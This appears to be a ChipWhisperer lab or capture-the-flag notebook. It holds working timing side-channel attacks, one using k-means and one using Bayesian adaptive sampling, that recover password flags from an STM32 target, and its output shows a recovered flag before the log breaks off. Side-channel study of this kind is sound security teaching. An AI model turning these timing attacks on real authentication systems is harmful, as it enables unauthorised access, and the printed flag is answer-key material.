# GateKeeper

In [1]:
SCOPETYPE = 'CWNANO'
PLATFORM = 'CWNANO'

In [2]:
%run "../setup/Setup_Generic.ipynb"

(ChipWhisperer NAEUSB WARNING|File naeusb.py:826) Your firmware (0.65.0) is outdated - latest is 0.66.0 See https://chipwhisperer.readthedocs.io/en/latest/firmware.html for more information


INFO: Found ChipWhisperer😍


In [3]:
cw.program_target(scope, prog, "gatekeeper-{}.hex".format(PLATFORM))

Detected known STMF32: STM32F04xxx
Extended erase (0x44), this can take ten seconds or more
Attempting to program 6279 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 6279 bytes


## Gatekeeper 1

In [4]:
import time
import struct
from string import ascii_lowercase, digits

import chipwhisperer as cw
import numpy as np 
from sklearn.cluster import KMeans 


CHARSET = ascii_lowercase + digits
PASSWORD_LENGTH = 8

scope = cw.scope()
target = cw.target(scope, cw.targets.SimpleSerial)
scope.default_setup()


def reset_target():
    scope.io.nrst = 'low'
    time.sleep(0.05)
    scope.io.nrst = 'high_z'
    time.sleep(0.05)


def verify(password):
    start = time.perf_counter()

    timeout = target.simpleserial_write('a', password)
    if timeout:
        raise RuntimeError("Capture timed out.")

    response = target.simpleserial_read('r', 1)
    end = time.perf_counter()
    timing = end - start
    return struct.unpack("<B", response)[0], timing


def num_q():
    target.simpleserial_write('q', b"0")
    response = target.simpleserial_read('r', 4)
    return struct.unpack("<I", response)[0]


def main():
    reset_target()

    prefix = b"gk1{"
    middle = b""
    suffix = b"}"

    # --- ML Optimization ---
    SAMPLES_PER_CHAR = 10 
    
    print(f"--- Starting ML-Optimized Attack ---")
    print(f"Targeting {PASSWORD_LENGTH} characters. Using {SAMPLES_PER_CHAR} samples per char.")
    
    for i in range(PASSWORD_LENGTH):
        padding = (PASSWORD_LENGTH - 1 - len(middle)) * b"!"
        
        print(f"\nAnalyzing position {i+1}...")
        
        # 1. Gather all data for this position
        timings = []
        char_map = [] # To map timings back to the char that caused them
        
        for character in CHARSET:
            character_b = character.encode()
            password = prefix + middle + character_b + padding + suffix
            
            # Gather N samples for this single character
            for _ in range(SAMPLES_PER_CHAR):
                _, timing = verify(password)
                timings.append(timing)
                char_map.append(character_b)

        # 2. Reshape data for k-Means
        # k-Means expects a 2D array [n_samples, n_features]
        X = np.array(timings).reshape(-1, 1)

        # 3. Run k-Means to find two clusters (fast and slow)
        # n_init=10 suppresses a warning
        kmeans = KMeans(n_clusters=2, n_init=10, random_state=0).fit(X)
        
        # 4. Find the "slow" cluster
        # The cluster centers are the average time for each cluster
        center_0 = kmeans.cluster_centers_[0][0]
        center_1 = kmeans.cluster_centers_[1][0]
        
        if center_0 > center_1:
            slow_cluster_label = 0
            slow_time = center_0
        else:
            slow_cluster_label = 1
            slow_time = center_1

        # 5. Find which character belongs to the slow cluster
        slow_chars = []
        for j in range(len(kmeans.labels_)):
            if kmeans.labels_[j] == slow_cluster_label:
                # Add the character that corresponds to this "slow" timing
                slow_chars.append(char_map[j])
        
        # The most frequent character in the slow cluster is our answer
        best_char_for_pos = max(set(slow_chars), key=slow_chars.count)
        
        middle += best_char_for_pos
        print(f"--- Found char: {best_char_for_pos.decode()} (Cluster Time: {slow_time:.3f}) ---")
        print(f"Current password: {prefix.decode()}{middle.decode()}...")

    # Verify the final, complete password
    final_password = prefix + middle + suffix
    response, timing = verify(final_password)
    
    print("\n--- Attack Complete ---")
    print(f"Got response code {response} for final password: {final_password.decode()}")
    
    if response == 1:
        print("✅ Success! Password matches.")
    else:
        print("❌ Failure! Password does not match.")

    response = num_q()
    print(f"Total queries made: {response}")


# --- Run the main function ---
if __name__ == "__main__":
    main()

(ChipWhisperer NAEUSB WARNING|File naeusb.py:826) Your firmware (0.65.0) is outdated - latest is 0.66.0 See https://chipwhisperer.readthedocs.io/en/latest/firmware.html for more information


--- Starting ML-Optimized Attack ---
Targeting 8 characters. Using 10 samples per char.

Analyzing position 1...
--- Found char: l (Cluster Time: 0.059) ---
Current password: gk1{l...

Analyzing position 2...
--- Found char: 0 (Cluster Time: 0.068) ---
Current password: gk1{l0...

Analyzing position 3...
--- Found char: g (Cluster Time: 0.075) ---
Current password: gk1{l0g...

Analyzing position 4...
--- Found char: 1 (Cluster Time: 0.086) ---
Current password: gk1{l0g1...

Analyzing position 5...
--- Found char: n (Cluster Time: 0.093) ---
Current password: gk1{l0g1n...

Analyzing position 6...
--- Found char: p (Cluster Time: 0.101) ---
Current password: gk1{l0g1np...

Analyzing position 7...
--- Found char: w (Cluster Time: 0.108) ---
Current password: gk1{l0g1npw...

Analyzing position 8...
--- Found char: n (Cluster Time: 0.117) ---
Current password: gk1{l0g1npwn...

--- Attack Complete ---
Got response code 1 for final password: gk1{l0g1npwn}
✅ Success! Password matches.
Total qu

## Gatekeeper 2

In [142]:
import time
import struct
from string import ascii_lowercase, ascii_uppercase, digits

import numpy as np
import chipwhisperer as cw

CHARSET = ascii_lowercase + ascii_uppercase + digits
PASSWORD_LENGTH = 12

# ---------------- Tunables ----------------
INITIAL_SAMPLES = 12        # initial samples per candidate 
MAX_SAMPLES_PER_CAND = 300  # safety cap per candidate
CONF_THRESHOLD = 0.980      # require this posterior prob to accept a char
MC_DRAWS = 4000             # Monte-Carlo draws to estimate win probabilities
ADAPTIVE_BATCH = 6          # add this many samples to each top contender when undecided
TOP_CONTENDERS = 3          # number of contenders to refine each iteration
BASELINE_SAMPLES = 20       # re-measure baseline before each position
MIN_VAR = 1e-8              # variance floor
PAUSE_BETWEEN = 0.01        # delay between device queries
RESET_ON_TIMEOUT = True     # reset on timeout

STABILITY_MIN_ITERS = 8     # minimum adaptive iterations before considering "most frequent top"
STABILITY_RATIO = 0.6       # how dominant the most frequent top pick must be
MAX_ADAPTIVE_ITERS = 100    # absolute cap on adaptive iterations per position
# ------------------------------------------

scope = cw.scope()
target = cw.target(scope, cw.targets.SimpleSerial)
scope.default_setup()


def reset_target():
    scope.io.nrst = 'low'
    time.sleep(0.05)
    scope.io.nrst = 'high_z'
    time.sleep(0.05)


def verify_raw(password):
    start = time.perf_counter()
    timeout = target.simpleserial_write('b', password)
    if timeout:
        raise RuntimeError("Capture timed out.")
    response = target.simpleserial_read('r', 1)
    end = time.perf_counter()
    return struct.unpack("<B", response)[0], (end - start)


def num_q():
    target.simpleserial_write('q', b"0")
    response = target.simpleserial_read('r', 4)
    return struct.unpack("<I", response)[0]


def measure_baseline(prefix, middle, suffix):
    """Return median timing for an all-padding reference to subtract global offset."""
    ref = prefix + middle + (PASSWORD_LENGTH - len(middle)) * b"!" + suffix
    samples = []
    for _ in range(BASELINE_SAMPLES):
        try:
            _, t = verify_raw(ref)
        except RuntimeError:
            if RESET_ON_TIMEOUT:
                reset_target()
                _, t = verify_raw(ref)
            else:
                raise
        samples.append(float(t))
        time.sleep(PAUSE_BETWEEN)
    return float(np.median(samples))


def posterior_params(sample_means, sample_vars, counts):
    """
    For each candidate, approximate posterior of the mean as Normal(mean, sigma^2 / n).
    We use sample variance as estimate of sigma^2 (with floor MIN_VAR).
    Returns arrays (mu, se) where se is std error of the mean.
    """
    mu = np.array(sample_means, dtype=float)
    var = np.maximum(np.array(sample_vars, dtype=float), MIN_VAR)
    n = np.maximum(np.array(counts, dtype=float), 1.0)
    se = np.sqrt(var / n)
    # ensure se not zero
    se = np.maximum(se, np.sqrt(MIN_VAR))
    return mu, se


def estimate_win_probabilities(mu, se, draws=MC_DRAWS):
    """
    Monte Carlo: draw from each candidate's Normal(mu, se) and find argmax for each draw.
    Return probability vector that candidate is the max.
    """
    k = len(mu)
    samples = np.random.normal(loc=mu[None, :], scale=se[None, :], size=(draws, k))
    winners = np.argmax(samples, axis=1)
    probs = np.bincount(winners, minlength=k).astype(float) / draws
    return probs


def solve_position(prefix, middle, suffix):
    """Solve one position adaptively and return chosen char (single-char string)."""
    pos = len(middle)
    pad = lambda: (PASSWORD_LENGTH - 1 - len(middle)) * b"!"
    k = len(CHARSET)

    # running stats per candidate
    counts = np.zeros(k, dtype=int)
    sums = np.zeros(k, dtype=float)
    sumsqs = np.zeros(k, dtype=float)

    def update(ci, t):
        counts[ci] += 1
        sums[ci] += t
        sumsqs[ci] += t * t

    def stats(ci):
        n = counts[ci]
        if n == 0:
            # before any samples, make it "not crazy" so posterior doesn't blow up
            return 0.0, 1.0
        mean = sums[ci] / n
        var = (sumsqs[ci] / n) - mean * mean
        var = max(var, MIN_VAR)
        return mean, var

    # 1. INITIAL sampling of EVERY candidate
    for ci, ch in enumerate(CHARSET):
        ch_b = ch.encode()
        pw = prefix + middle + ch_b + pad() + suffix
        for _ in range(INITIAL_SAMPLES):
            try:
                _, t_raw = verify_raw(pw)
            except RuntimeError:
                if RESET_ON_TIMEOUT:
                    reset_target()
                    _, t_raw = verify_raw(pw)
                else:
                    raise
            update(ci, float(t_raw))
            time.sleep(PAUSE_BETWEEN)

    # We'll track which candidate is "currently best" over time.
    # Then we can vote on consistency if CONF_THRESHOLD never triggers.
    top_history_counts = np.zeros(k, dtype=int)
    iter_count = 0

    # 2. ADAPTIVE loop
    while True:
        iter_count += 1

        # compute per-candidate sample mean & variance
        means = np.array([stats(ci)[0] for ci in range(k)])
        vars_ = np.array([stats(ci)[1] for ci in range(k)])

        # approximate posterior mean and std error
        mu, se = posterior_params(means, vars_, counts)

        # estimate probability each candidate is the "slowest" (i.e. correct)
        probs = estimate_win_probabilities(mu, se)
        top_idx = int(np.argmax(probs))
        top_prob = float(probs[top_idx])

        # update stability vote
        top_history_counts[top_idx] += 1

        # diagnostics
        topk = np.argsort(probs)[::-1][:6]
        diag = " | ".join(
            [f"{CHARSET[i]}:p={probs[i]:.3f},mean={means[i]:.6f},n={counts[i]}"
             for i in topk]
        )
        print(f"pos{pos} top: {diag}")

        # check clean Bayesian decision
        sorted_probs = np.sort(probs)[::-1]
        gap = (
            sorted_probs[0] - sorted_probs[1]
            if len(sorted_probs) > 1
            else sorted_probs[0]
        )
        if (top_prob >= CONF_THRESHOLD) and (gap > 0.02):
            print(f"ACCEPT pos{pos} '{CHARSET[top_idx]}' p={top_prob:.4f} gap={gap:.4f}")
            return CHARSET[top_idx]

        # --- stability-based decision rule ---
        # If we haven't reached CONF_THRESHOLD, we can still accept
        # if one candidate has dominated the "top pick" vote for long enough.
        if iter_count >= STABILITY_MIN_ITERS:
            # who has the most 'top' votes so far?
            stable_idx = int(np.argmax(top_history_counts))
            stable_votes = int(top_history_counts[stable_idx])
            ratio = stable_votes / float(iter_count)

            # If one candidate is top most of the time, and it's not just random flip-flopping,
            # accept that candidate now.
            if ratio >= STABILITY_RATIO:
                print(
                    f"STABILITY ACCEPT pos{pos} '{CHARSET[stable_idx]}' "
                    f"ratio={ratio:.3f} iters={iter_count}"
                )
                return CHARSET[stable_idx]

        # If we've looped too long, bail out gracefully:
        # choose whichever has the most top votes (stable best),
        # otherwise fallback to highest mean.
        if iter_count >= MAX_ADAPTIVE_ITERS:
            stable_idx = int(np.argmax(top_history_counts))
            stable_votes = int(top_history_counts[stable_idx])
            ratio = stable_votes / float(iter_count)
            if ratio >= 0.4:
                # 0.4 here is looser than STABILITY_RATIO to guarantee we don't get stuck forever
                print(
                    f"MAX_ITER fallback via stability at pos{pos}: "
                    f"'{CHARSET[stable_idx]}' ratio={ratio:.3f} iters={iter_count}"
                )
                return CHARSET[stable_idx]
            else:
                # super last resort: pick highest observed mean (slowest average timing)
                fallback_idx = int(np.argmax(means))
                print(
                    f"MAX_ITER hard fallback via max mean at pos{pos}: "
                    f"'{CHARSET[fallback_idx]}'"
                )
                return CHARSET[fallback_idx]

        # Otherwise, we're still undecided: take more measurements of the top contenders.
        contenders = np.argsort(probs)[::-1][:TOP_CONTENDERS]

        # If all contenders are already at MAX_SAMPLES_PER_CAND,
        # then we're spinning our wheels -> fallback to stable vote or best mean.
        if np.all(counts[contenders] >= MAX_SAMPLES_PER_CAND):
            stable_idx = int(np.argmax(top_history_counts))
            stable_votes = int(top_history_counts[stable_idx])
            ratio = stable_votes / float(iter_count)
            if ratio >= 0.4:
                print(
                    f"MAX_SAMPLES fallback via stability at pos{pos}: "
                    f"'{CHARSET[stable_idx]}' ratio={ratio:.3f} iters={iter_count}"
                )
                return CHARSET[stable_idx]
            else:
                fallback_idx = int(np.argmax(means))
                print(
                    "Max samples reached, fallback to highest mean:",
                    CHARSET[fallback_idx],
                )
                return CHARSET[fallback_idx]

        # Sample additional data for top contenders only (round-robin style)
        for idx in contenders:
            if counts[idx] >= MAX_SAMPLES_PER_CAND:
                continue
            ch_b = CHARSET[idx].encode()
            pw = prefix + middle + ch_b + pad() + suffix
            for _ in range(ADAPTIVE_BATCH):
                try:
                    _, t_raw = verify_raw(pw)
                except RuntimeError:
                    if RESET_ON_TIMEOUT:
                        reset_target()
                        _, t_raw = verify_raw(pw)
                    else:
                        raise
                update(idx, float(t_raw))
                time.sleep(PAUSE_BETWEEN)


def attack(prefix=b"gk2{", middle=b"", suffix=b"}"):
    reset_target()
    print("Starting Bayesian sequential solver...")

    while len(middle) < PASSWORD_LENGTH:
        print("\n--- New position ---")
        # re-measure baseline for this new position to reduce drift effect
        baseline = measure_baseline(prefix, middle, suffix)
        print(f"[baseline median] {baseline:.6f}s")

        # We'll locally wrap verify_raw so that solve_position "sees" baseline-subtracted times.
        # Then restore verify_raw afterward so the rest of the code still works.
        global verify_raw
        orig_verify = verify_raw

        def v_wrapped(pw):
            r, t = orig_verify(pw)
            return r, (t - baseline)

        verify_raw = v_wrapped
        try:
            chosen = solve_position(prefix, middle, suffix)
        finally:
            verify_raw = orig_verify

        middle += chosen.encode()
        print(f"CHOSEN so far: {prefix.decode()}{middle.decode()}...")

        # small confirmation run for the chosen char to detect gross mistakes early
        confirm_pw = prefix + middle + (PASSWORD_LENGTH - len(middle)) * b"!" + suffix
        confirm_samples = []
        for _ in range(12):
            try:
                _, t = verify_raw(confirm_pw)
            except RuntimeError:
                if RESET_ON_TIMEOUT:
                    reset_target()
                    _, t = verify_raw(confirm_pw)
                else:
                    raise
            confirm_samples.append(float(t))
            time.sleep(PAUSE_BETWEEN)
        print(f"confirm median (baseline-subtracted): {np.median(confirm_samples):.6f}")

    final_pw = prefix + middle + suffix
    # final check with the original raw verify
    resp, t = verify_raw(final_pw)
    print("\n=== Finished ===")
    print("Recovered:", final_pw.decode())
    print("Response code:", resp)
    q = num_q()
    print("Total queries:", q)
    return final_pw.decode(), resp


if __name__ == "__main__":
    attack()


(ChipWhisperer NAEUSB WARNING|File naeusb.py:826) Your firmware (0.65.0) is outdated - latest is 0.66.0 See https://chipwhisperer.readthedocs.io/en/latest/firmware.html for more information


Starting Bayesian sequential solver...

--- New position ---
[baseline median] 0.033756s
pos0 top: 7:p=0.952,mean=0.008400,n=12 | 6:p=0.017,mean=0.006607,n=12 | P:p=0.006,mean=0.005754,n=12 | S:p=0.005,mean=0.004906,n=12 | 5:p=0.003,mean=0.005330,n=12 | G:p=0.003,mean=0.004773,n=12
pos0 top: 7:p=0.923,mean=0.007845,n=18 | S:p=0.011,mean=0.004906,n=12 | G:p=0.010,mean=0.004773,n=12 | 5:p=0.010,mean=0.005330,n=12 | z:p=0.009,mean=0.005410,n=12 | P:p=0.006,mean=0.005380,n=18
pos0 top: 7:p=0.890,mean=0.007543,n=24 | 5:p=0.021,mean=0.005330,n=12 | z:p=0.013,mean=0.005410,n=12 | P:p=0.011,mean=0.005380,n=18 | V:p=0.009,mean=0.005126,n=12 | 6:p=0.008,mean=0.005615,n=18
pos0 top: 7:p=0.633,mean=0.006737,n=30 | P:p=0.047,mean=0.005380,n=18 | 6:p=0.041,mean=0.005615,n=18 | V:p=0.035,mean=0.005126,n=12 | G:p=0.029,mean=0.005105,n=18 | W:p=0.019,mean=0.005627,n=12
pos0 top: 7:p=0.798,mean=0.006997,n=36 | V:p=0.022,mean=0.005126,n=12 | G:p=0.017,mean=0.005105,n=18 | C:p=0.015,mean=0.004410,n=12 | 0